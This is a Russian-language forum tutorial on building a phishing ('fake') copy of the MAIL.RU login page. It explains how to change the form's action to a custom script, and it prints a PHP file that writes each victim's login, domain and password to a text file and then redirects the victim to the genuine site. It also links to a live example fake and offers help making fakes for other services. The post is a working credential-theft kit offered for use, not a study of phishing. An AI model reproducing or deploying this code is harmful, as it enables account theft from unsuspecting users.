Не видел эту статью в этом разделе, решил выложить.
Всем привет.
Сегодня я вам расскажу как работать с фейками или как сделать фейк своими руками
Начнем.....
Нам нужен хостинг с поддержкой php
И так я вам покажу на примере почтовой службы MAIL.RU (так как на нее проще всего сделать)
Идем на страницу http://win.mail.ru/cgi-bin/login
почему именно на нее?
Так потому что там сама простая страница аунтефикации MAIL.RU
Ищем там такую строчку
Код:
<form method="post" action="auth" onSubmit="return CheckForm(this);">
и редактируем на
Код:
<form method="post" action="nash_auth.php" onSubmit="return CheckForm(this);">
Что это озночает?
action="nash_auth.php" это страница с кодом,код отвечает на запись логина и пароля(что нам и надо)
Дальше стераем строчки со словом hidden
и сохраняем.....
Файл nash_auth.php
Создаем его и пишем в него это
Код:
<?PHP
$Login = $_POST['Login'];
$Domain = $_POST['Domain'];
$Pass = $_POST['Password'];
$c = "$Login@$Domain:$Pass";
$fp = fopen("pass.txt","a+"); //
fwrite($fp,"\n [$c] \n");
fclose($fp);
header("Location: http://cards.mail.ru/card.html?cdu=8975 … b045");
echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"
?>
расмотрим этот код.......
===========================
Это конечно наши поля
Код:
$Login = $_POST['Login'];
$Domain = $_POST['Domain'];
$Pass = $_POST['Password'];
===========================
Как будем записывать (если так то он должен записать к примеру так admin@mail.ru:123123)
Код:
$c = "$Login@$Domain:$Pass";
===========================
Файл куда все будем записывать
Код:
$fp = fopen("pass.txt","a+"); //
===========================
Это куда будем перенаправлять когда жертва ввела пароль и логин (и конечно же нажала кнопку войти)
Код:
header("Location: http://cards.mail.ru/card.html?cdu=8975 … b045");
===========================
Я так думаю это скрипт маила то есть если не ввел пароль то выскочит "Не заполнены доп поля"
Код:
echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"
===========================
Так же выставляем права на pass.txt 777 и на nash_auth.php права 755
И так на нашем хостинге должно быть такие файлы:
nash_auth.php (файл каторый записывает логины и пароли)
pass.txt (куда будут сохраняться пароли)
auth.php (система аунтифекации)
На этом все))
Автор: diznt
Спасибо за прочтение
Если будут вопросы по фейкам (не токо по MAIL.RU) то задавайте разберемся)
Удачи
ПРИМЕР ФЕЙКА: http://dark-gamer.ru/test/auth.htm

